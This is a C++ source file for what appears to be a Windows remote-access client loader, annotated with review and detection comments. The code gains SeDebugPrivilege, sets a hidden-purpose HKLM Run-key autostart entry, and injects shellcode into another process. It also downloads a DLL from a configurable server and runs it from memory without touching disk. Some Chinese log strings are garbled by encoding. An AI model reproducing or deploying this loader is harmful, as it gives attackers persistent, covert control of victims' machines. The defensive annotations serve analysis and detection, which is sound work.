#include "StdAfx.h"
#include "MemoryModule.h"
#include "ShellcodeInj.h"
#include <WS2tcpip.h>
#include <common/commands.h>
#include "common/dllRunner.h"
#pragma comment(lib, "ws2_32.lib")
// Value name that main() hands to SetSelfStart() for the autostart registry
// entry. It is a fixed string, so it is a searchable host artifact.
#define REG_NAME "a_ghost"

// Signatures of the entry points Run() resolves by name from the loaded
// module ("StopRun", "IsStoped", "IsExit").
using StopRun = void (*)();
using IsStoped = bool (*)();
using IsExit = BOOL (*)();

// Asks the loaded module to stop; called from the console control handler.
StopRun stop = nullptr;

// Polled by Run() to learn whether the module has finished stopping.
IsStoped bStop = nullptr;

// Polled by Run() for the module's exit decision (Run() repeats while it
// returns 2).
IsExit bExit = nullptr;

// Shutdown flag: 0 while running, set to 1 by callback() on CTRL_CLOSE_EVENT,
// reset to 0 by main() before it returns.
// NOTE(review): this is a plain BOOL that callback() writes and the loops in
// main()/Run() poll; if the handler runs on another thread (as console control
// handlers normally do) the accesses are unsynchronised - confirm and consider
// an atomic.
BOOL status = FALSE;

// Manual-reset event created in main(); callback() signals it so the wait on
// the injected process can return.
HANDLE hEvent = nullptr;

// Built-in connection record. Visible values: marker FLAG_FINDEN, host
// "127.0.0.1", port "6543", client type CLIENT_TYPE_DLL and startup mode
// Startup_InjSC. The meaning of the remaining fields comes from the project's
// CONNECT_ADDRESS declaration, which is not part of this file.
CONNECT_ADDRESS g_ConnectAddress = {
    FLAG_FINDEN,
    "127.0.0.1",
    "6543",
    CLIENT_TYPE_DLL,
    false,
    DLL_VERSION,
    0,
    Startup_InjSC
};
/**
 * @brief Enable SeDebugPrivilege on the current process token.
 *
 * Opens the process token, looks up the LUID for SE_DEBUG_NAME and asks for
 * it to be enabled. Nothing is reported back to the caller.
 *
 * @note Security context: an enabled debug privilege lets a process open
 *       other processes it could not otherwise touch, which is why a token
 *       adjustment like this is worth auditing on monitored hosts.
 *
 * NOTE(review): the results of LookupPrivilegeValue and AdjustTokenPrivileges
 * are ignored, so a failed lookup leaves the LUID uninitialised when it is
 * passed on. TOKEN_ALL_ACCESS is also far broader than an adjustment needs.
 */
void DebugPrivilege()
{
    HANDLE token = NULL;

    // Without a token handle there is nothing to adjust.
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token))
        return;

    TOKEN_PRIVILEGES request;
    request.PrivilegeCount = 1;
    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &request.Privileges[0].Luid);
    request.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    AdjustTokenPrivileges(token, FALSE, &request, sizeof(request), NULL, NULL);

    CloseHandle(token);
}
/**
 * @brief Register a program to start automatically via the HKLM Run key.
 * @param[in] sPath  String written as the value data (main() passes argv[0]).
 * @param[in] sNmae  Name of the registry value to create or overwrite.
 * @return TRUE when the value was written, FALSE when the key could not be
 *         opened or the write failed.
 * @details The original comment records that on 64-bit Windows 7 the entry
 *          shows up under
 *          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
 * @note Writing under HKEY_LOCAL_MACHINE needs administrative rights; the
 *       original comment says the first run must be elevated.
 * @note Security context: a Run-key value is a persistence mechanism.
 *       Registry auditing on this key, and on the value name the caller
 *       passes, is the natural detection point.
 *
 * NOTE(review): KEY_ALL_ACCESS is requested although only a value write is
 * performed. sPath is dereferenced by strlen() with no NULL check, and it is
 * stored unquoted, so a path containing spaces is ambiguous as a command line.
 */
BOOL SetSelfStart(const char *sPath, const char *sNmae)
{
    DebugPrivilege();

    // Sub-key that holds the autostart values. The macro stays defined for
    // the rest of the translation unit, exactly as in the original.
#define REGEDIT_PATH "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"

    HKEY runKey = NULL;
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, REGEDIT_PATH, 0, KEY_ALL_ACCESS, &runKey) != ERROR_SUCCESS)
        return FALSE;

    // REG_SZ data length includes the terminating NUL.
    const LONG writeStatus = RegSetValueExA(runKey, sNmae, 0, REG_SZ,
                                            (const BYTE*)sPath, strlen(sPath) + 1);

    // The key is closed whether or not the write succeeded.
    RegCloseKey(runKey);

    return writeStatus == ERROR_SUCCESS;
}
/**
 * @brief Console control handler installed by main().
 *
 * On CTRL_CLOSE_EVENT it raises the shutdown flag, signals hEvent (if one was
 * created), asks the loaded module to stop (if `stop` was resolved) and then
 * waits until some other code resets `status`.
 *
 * @param CtrlType Control signal delivered by the console.
 * @return Always TRUE.
 *
 * NOTE(review): TRUE is returned for every control type, including the ones
 * this handler does nothing about - confirm that reporting them as handled is
 * intended. The wait below is a 20 ms polling loop on a non-atomic global.
 */
BOOL CALLBACK callback(DWORD CtrlType)
{
    if (CtrlType != CTRL_CLOSE_EVENT)
        return TRUE;

    status = 1;

    // Wake the wait in main() that watches the injected process.
    if (hEvent != NULL)
        SetEvent(hEvent);

    if (stop != NULL)
        stop();

    // Hold the handler here until main() clears the flag.
    while (status == 1) {
        Sleep(20);
    }

    return TRUE;
}
// Run the program.
BOOL Run(const char* argv1, int argv2);
// Package header placed in front of every request MemoryDllRunner sends.
//
// Layout as declared: an 8-byte flag holding the text "Hello?", then the
// total length (header + body) and the body length, both as int.
//
// Security context: the constant flag text makes the first bytes of each
// request a stable, plaintext pattern that network monitoring can match on.
typedef struct PkgHeader {
    char flag[8];
    int totalLen;
    int originLen;

    // size is the number of body bytes that follow the header.
    PkgHeader(int size)
        : totalLen(static_cast<int>(sizeof(PkgHeader) + size)),
          originLen(size)
    {
        // Clear the flag first, then copy the marker text into it.
        memset(flag, 0, sizeof(flag));
        strcpy_s(flag, "Hello?");
    }
} PkgHeader;
// Memory DLL runner: a DllRunner that fetches a module image over TCP from
// the address in g_ConnectAddress and maps it with the MemoryModule API
// instead of loading a file from disk.
//
// Security context for reviewers and defenders:
//  - The image is requested over a plain TCP socket and handed to
//    MemoryLoadLibrary. No authentication or integrity check of the received
//    bytes is visible in this class, so whatever answers on that address
//    decides what code this process runs.
//  - Nothing here writes the module to disk, so file-based scanning will not
//    see it; the request header ("Hello?" flag, see PkgHeader) and the
//    outbound connection are the observable parts.
class MemoryDllRunner : public DllRunner {
protected:
    // Handle of the module mapped by LoadLibraryA(); nullptr until then.
    HMEMORYMODULE m_mod;

    // Turn a host string into a dotted IPv4 string.
    // Returns the input unchanged when it already parses as IPv4, the first
    // getaddrinfo() result otherwise, or "" when resolution fails.
    // NOTE(review): the inet_ntop() result is not checked; on failure the
    // zero-initialised buffer yields an empty string.
    std::string GetIPAddress(const char* hostName)
    {
        // Already a literal IPv4 address: nothing to resolve.
        sockaddr_in literal;
        if (inet_pton(AF_INET, hostName, &(literal.sin_addr)) == 1) {
            return std::string(hostName);
        }

        // Otherwise resolve the name, IPv4/TCP only.
        addrinfo hints = {};
        addrinfo* found = nullptr;
        hints.ai_family = AF_INET;
        hints.ai_socktype = SOCK_STREAM;
        hints.ai_protocol = IPPROTO_TCP;

        if (getaddrinfo(hostName, nullptr, &hints, &found) != 0)
            return "";

        char text[INET_ADDRSTRLEN] = {};
        sockaddr_in* first = (sockaddr_in*)found->ai_addr;
        inet_ntop(AF_INET, &(first->sin_addr), text, INET_ADDRSTRLEN);

        freeaddrinfo(found);
        return std::string(text);
    }

public:
    MemoryDllRunner() : m_mod(nullptr) {}

    // Connect to the configured server, send a 4-byte loader command behind
    // a PkgHeader, and read the reply into a freshly allocated 4 MiB buffer.
    //
    // Reply layout as parsed below: PkgHeader, then one command byte, one
    // type byte, a 4-byte length, then that many image bytes.
    //
    // Returns nullptr only when WSAStartup fails; otherwise the buffer, which
    // the caller owns. `size` receives the length field from the reply.
    //
    // NOTE(review): `continue` inside `do { } while (false)` jumps to the
    // loop condition, which is false, so every failure path leaves the loop
    // rather than retrying and the Sleep(5000) branch is never taken. After
    // a failed exchange the buffer is still returned, with `size` either
    // untouched or taken from a reply whose length did not match, and the
    // caller has no way to tell. The length-mismatch path also skips
    // closesocket(). The length field is used without a range check.
    virtual const char* ReceiveDll(int &size) {
        WSADATA wsa = {};
        if (WSAStartup(MAKEWORD(2, 2), &wsa))
            return nullptr;

        const int bufSize = 4 * 1024 * 1024;
        char* buffer = new char[bufSize];
        bool isFirstConnect = true;

        do {
            if (!isFirstConnect)
                Sleep(5000);
            isFirstConnect = false;

            SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
            if (sock == INVALID_SOCKET)
                continue;

            // Bound each recv() so the read loop below ends once the peer
            // goes quiet.
            DWORD recvTimeoutMs = 5000;
            setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (const char*)&recvTimeoutMs, sizeof(recvTimeoutMs));

            sockaddr_in server = {};
            server.sin_family = AF_INET;
            server.sin_port = htons(g_ConnectAddress.ServerPort());
            std::string ip = GetIPAddress(g_ConnectAddress.ServerIP());
            server.sin_addr.s_addr = inet_addr(ip.c_str());
            if (connect(sock, (SOCKADDR*)&server, sizeof(server)) == SOCKET_ERROR) {
                closesocket(sock);
                continue;
            }

            // Command bytes: loader command, 64-bit flag, MEMORYDLL, and a
            // last byte that is 0 in debug builds and 1 otherwise.
#ifdef _DEBUG
            const char buildByte = 0;
#else
            const char buildByte = 1;
#endif
            char command[4] = { SOCKET_DLLLOADER, sizeof(void*) == 8, MEMORYDLL, buildByte };

            char req[sizeof(PkgHeader) + 4] = {};
            PkgHeader header(4);
            memcpy(req, &header, sizeof(PkgHeader));
            memcpy(req + sizeof(PkgHeader), command, sizeof(command));
            if (send(sock, req, sizeof(req), 0) != sizeof(req)) {
                closesocket(sock);
                continue;
            }

            // Read until the buffer is full, the peer closes, or recv()
            // fails or times out.
            char* payload = buffer + sizeof(PkgHeader);
            const int chunk = 16 * 1024;
            int total = 0;
            while (total < bufSize) {
                int want = min(chunk, bufSize - total);
                int got = recv(sock, buffer + total, want, 0);
                if (got <= 0)
                    break;
                total += got;
            }

            // Need at least the header plus command, type and length.
            if (total < sizeof(PkgHeader) + 6) {
                closesocket(sock);
                continue;
            }

            // payload[0] (command) and payload[1] (type) are not examined
            // here; only the length field is extracted.
            size = 0;
            memcpy(&size, payload + 2, sizeof(int));
            if (total != size + 6 + sizeof(PkgHeader)) {
                continue;
            }

            closesocket(sock);
        } while (false);

        WSACleanup();
        return buffer;
    }

    // Request the module from the server and map it in memory.
    // `path` and `len` are not used by this implementation.
    //
    // If the received data contains the FLAG_FINDEN marker, the
    // CONNECT_ADDRESS found there is rewritten in place with this process's
    // server IP and port before the image is mapped.
    //
    // NOTE(review): MemoryFind scans `size` bytes starting at the beginning
    // of the buffer, while the image itself starts 6 + sizeof(PkgHeader)
    // bytes in - confirm the window is intended. The strcpy into szServerIP
    // is unbounded, and `size` arrives unvalidated from ReceiveDll().
    virtual void* LoadLibraryA(const char* path, int len=0) {
        int size = 0;
        auto buffer = ReceiveDll(size);
        if (buffer == nullptr)
            return nullptr;

        int markerPos = MemoryFind(buffer, FLAG_FINDEN, size, sizeof(FLAG_FINDEN) - 1);
        if (markerPos != -1) {
            CONNECT_ADDRESS* embedded = (CONNECT_ADDRESS*)(buffer + markerPos);
            BYTE type = buffer[sizeof(PkgHeader) + 1];
            embedded->iType = type == MEMORYDLL ? CLIENT_TYPE_MEMDLL : CLIENT_TYPE_SHELLCODE;
            memset(embedded->szFlag, 0, sizeof(embedded->szFlag));
            strcpy(embedded->szServerIP, g_ConnectAddress.ServerIP());
            sprintf_s(embedded->szPort, "%d", g_ConnectAddress.ServerPort());
        }

        m_mod = ::MemoryLoadLibrary(buffer + 6 + sizeof(PkgHeader), size);
        SAFE_DELETE_ARRAY(buffer);
        return m_mod;
    }

    // Resolve an export from a module mapped by LoadLibraryA().
    virtual FARPROC GetProcAddress(void* mod, const char* lpProcName) {
        HMEMORYMODULE module = (HMEMORYMODULE)mod;
        return ::MemoryGetProcAddress(module, lpProcName);
    }

    // Unmap a module mapped by LoadLibraryA(). Always reports TRUE.
    virtual BOOL FreeLibrary(void* mod) {
        HMEMORYMODULE module = (HMEMORYMODULE)mod;
        ::MemoryFreeLibrary(module);
        return TRUE;
    }
};
// @brief Program entry point.
//
// Server address selection (carried out in Run()): a settings.ini next to the
// executable is consulted first,
//   [settings]
//   localIp=XXX
//   ghost=6688
// and when that file does not exist the IP and port come from the command
// line, falling back to g_ConnectAddress and then to 127.0.0.1:6543.
//
// Sequence visible in this function:
//   1. Register argv[0] for autostart under the value name REG_NAME.
//   2. Install the console control handler.
//   3. In Startup_InjSC mode on a 64-bit build, call
//      ShellcodeInj::InjectProcess, wait on the resulting process and repeat
//      when it exits; the original comment names notepad.exe as the target.
//   4. Switch to Startup_MEMDLL and call Run() until shutdown is requested.
// Every return path yields -1.
//
// Security context: steps 1 and 3 are the host-visible behaviours -
// an HKLM Run value, and a second process that this one opens with
// PROCESS_TERMINATE | SYNCHRONIZE after injecting into it.
//
// NOTE(review): the CreateEventA result is not checked; with a NULL event the
// wait would fail immediately and the loop would re-inject without pausing.
// The wait result itself is discarded. hEvent is closed only on the shutdown
// path and the global keeps the stale handle value.
int main(int argc, const char *argv[])
{
    // Autostart registration is best-effort: a failure is only reported.
    if (!SetSelfStart(argv[0], REG_NAME)) {
        Mprintf("<EFBFBD><EFBFBD><EFBFBD>ÿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD>ܣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ù<EFBFBD><EFBFBD><EFBFBD>ԱȨ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.\n");
    }

    status = 0;
    SetConsoleCtrlHandler(&callback, TRUE);

    if (g_ConnectAddress.iStartup == Startup_InjSC) {
        // Try the shell-code path first; any failure falls through to the
        // memory-DLL path below.
        ShellcodeInj inj;
        int pid = 0;
        hEvent = ::CreateEventA(NULL, TRUE, FALSE, NULL);

        do {
            // The shell code is 64-bit, so a 32-bit build skips this path.
            if (sizeof(void*) == 4)
                break;

            pid = inj.InjectProcess(nullptr);
            if (!pid)
                break;

            HANDLE target = OpenProcess(PROCESS_TERMINATE | SYNCHRONIZE, FALSE, pid);
            if (target == NULL)
                break;
            Mprintf("Inject process [%d] succeed.\n", pid);

            // Sleep until the target exits or the close handler signals.
            HANDLE waitSet[2] = { target, hEvent };
            WaitForMultipleObjects(2, waitSet, FALSE, INFINITE);

            if (status == 1) {
                TerminateProcess(target, -1);
                CloseHandle(hEvent);
            }
            CloseHandle(target);
            Mprintf("Process [%d] is finished.\n", pid);

            // Checked again on purpose: the flag can change at any time.
            if (status == 1)
                return -1;
        } while (pid);
    }

    // From here on the loader uses the in-memory DLL path.
    if (g_ConnectAddress.iStartup == Startup_InjSC) {
        g_ConnectAddress.iStartup = Startup_MEMDLL;
    }

    do {
        const char* host = argc > 1
            ? argv[1]
            : (strlen(g_ConnectAddress.ServerIP()) == 0 ? "127.0.0.1" : g_ConnectAddress.ServerIP());
        int port = argc > 2
            ? atoi(argv[2])
            : (g_ConnectAddress.ServerPort() == 0 ? 6543 : g_ConnectAddress.ServerPort());

        BOOL ret = Run(host, port);
        if (ret == 1) {
            return -1;
        }
    } while (status == 0);

    // Release callback(), which is spinning until the flag clears.
    status = 0;
    return -1;
}
// Load the server module and run it against one server address.
//
// argv1 / argv2 are the IP and port taken from the command line (or the
// defaults chosen in main()); they are used only when no settings.ini sits
// next to the executable.
//
// Steps:
//   1. Derive the executable's folder and, if ServerDll.new exists there,
//      rotate it in: ServerDll.dll becomes a hidden ServerDll.old and
//      ServerDll.new becomes ServerDll.dll.
//   2. Pick a DllRunner according to g_ConnectAddress.iStartup and load the
//      module through it.
//   3. Resolve TestRun / StopRun / IsStoped / IsExit and drive the module
//      until it reports it is done or shutdown is requested.
// Returns FALSE when the module or its TestRun export is unavailable,
// otherwise the last value returned by the module's IsExit (FALSE if that
// export is missing).
//
// Security context: ServerDll.old with the hidden attribute, and
// ServerDll.new / settings.ini beside the executable, are file-system
// artifacts of this routine.
//
// NOTE(review):
//  - GetModuleFileNameA's result is unchecked and the backward scan for '\\'
//    has no lower bound.
//  - strcpy(ip, argv1) and the strcpy calls onto the path tail are unbounded.
//  - The global stop/bStop/bExit pointers still point into the module after
//    FreeLibrary, while callback() may call stop().
//  - GetLastError() is read after other calls and may be stale.
BOOL Run(const char* argv1, int argv2) {
    BOOL result = FALSE;

    // Locate the last path separator of the executable's own path.
    char path[_MAX_PATH];
    char* lastSep = path;
    GetModuleFileNameA(NULL, path, sizeof(path));
    while (*lastSep) ++lastSep;
    while (*lastSep != '\\') --lastSep;
    lastSep[1] = 0;

    const std::string folder = path;
    const std::string oldFile = folder + "ServerDll.old";
    const std::string newFile = folder + "ServerDll.new";
    strcpy(lastSep + 1, "ServerDll.dll");

    // A pending ServerDll.new means an update should be rotated in.
    if (_access(newFile.c_str(), 0) != -1) {
        BOOL ok = TRUE;

        if (_access(oldFile.c_str(), 0) != -1 && !DeleteFileA(oldFile.c_str())) {
            Mprintf("Error deleting file. Error code: %d\n", GetLastError());
            ok = FALSE;
        }

        if (ok && !MoveFileA(path, oldFile.c_str())) {
            Mprintf("Error removing file. Error code: %d\n", GetLastError());
            ok = FALSE;
        } else if (SetFileAttributesA(oldFile.c_str(), FILE_ATTRIBUTE_HIDDEN)) {
            // Reached after a successful move, and also when the earlier
            // delete failed.
            Mprintf("File created and set to hidden: %s\n",oldFile.c_str());
        }

        if (ok && !MoveFileA(newFile.c_str(), path)) {
            Mprintf("Error removing file. Error code: %d\n", GetLastError());
            MoveFileA(oldFile.c_str(), path); // put the previous DLL back
        } else if (ok) {
            Mprintf("Using new file: %s\n", newFile.c_str());
        }
    }

    // Choose how the module is brought in: from disk or from the network.
    DllRunner* runner = nullptr;
    switch (g_ConnectAddress.iStartup) {
    case Startup_DLL:
        runner = new DefaultDllRunner;
        break;
    case Startup_MEMDLL:
        runner = new MemoryDllRunner;
        break;
    default:
        ExitProcess(-1);
        break;
    }

    void* hDll = runner->LoadLibraryA(path);

    typedef void (*TestRun)(char* strHost, int nPort);
    TestRun run = hDll ? TestRun(runner->GetProcAddress(hDll, "TestRun")) : NULL;
    stop = hDll ? StopRun(runner->GetProcAddress(hDll, "StopRun")) : NULL;
    bStop = hDll ? IsStoped(runner->GetProcAddress(hDll, "IsStoped")) : NULL;
    bExit = hDll ? IsExit(runner->GetProcAddress(hDll, "IsExit")) : NULL;

    // Without the TestRun entry point there is nothing to drive.
    if (run == NULL) {
        if (hDll) runner->FreeLibrary(hDll);
        Mprintf("<EFBFBD><EFBFBD><EFBFBD>ض<EFBFBD>̬<EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD>\"ServerDll.dll\"ʧ<EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: %d\n", GetLastError());
        Sleep(3000);
        delete runner;
        return FALSE;
    }

    do {
        char ip[_MAX_PATH];
        strcpy_s(ip, g_ConnectAddress.ServerIP());
        int port = g_ConnectAddress.ServerPort();

        // settings.ini beside the executable overrides the arguments.
        strcpy(lastSep + 1, "settings.ini");
        if (_access(path, 0) == -1) {
            // No settings file: use the values handed in by main().
            strcpy(ip, argv1);
            port = argv2;
        } else {
            GetPrivateProfileStringA("settings", "localIp", g_ConnectAddress.ServerIP(), ip, _MAX_PATH, path);
            port = GetPrivateProfileIntA("settings", "ghost", g_ConnectAddress.ServerPort(), path);
        }
        Mprintf("[server] %s:%d\n", ip, port);

        // Run the module, wait for it to stop, and repeat until it asks to
        // exit or shutdown is requested.
        do {
            run(ip, port);
            while (bStop && !bStop() && 0 == status)
                Sleep(20);
        } while (bExit && !bExit() && 0 == status);

        // During shutdown, give the module time to finish stopping.
        while (bStop && !bStop() && 1 == status)
            Sleep(20);

        if (bExit) {
            result = bExit();
        }
    } while (result == 2);

    if (!runner->FreeLibrary(hDll)) {
        Mprintf("<EFBFBD>ͷŶ<EFBFBD>̬<EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD>\"ServerDll.dll\"ʧ<EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: %d\n", GetLastError());
    } else {
        Mprintf("<EFBFBD>ͷŶ<EFBFBD>̬<EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD>\"ServerDll.dll\"<EFBFBD>ɹ<EFBFBD>!\n");
    }

    delete runner;
    return result;
}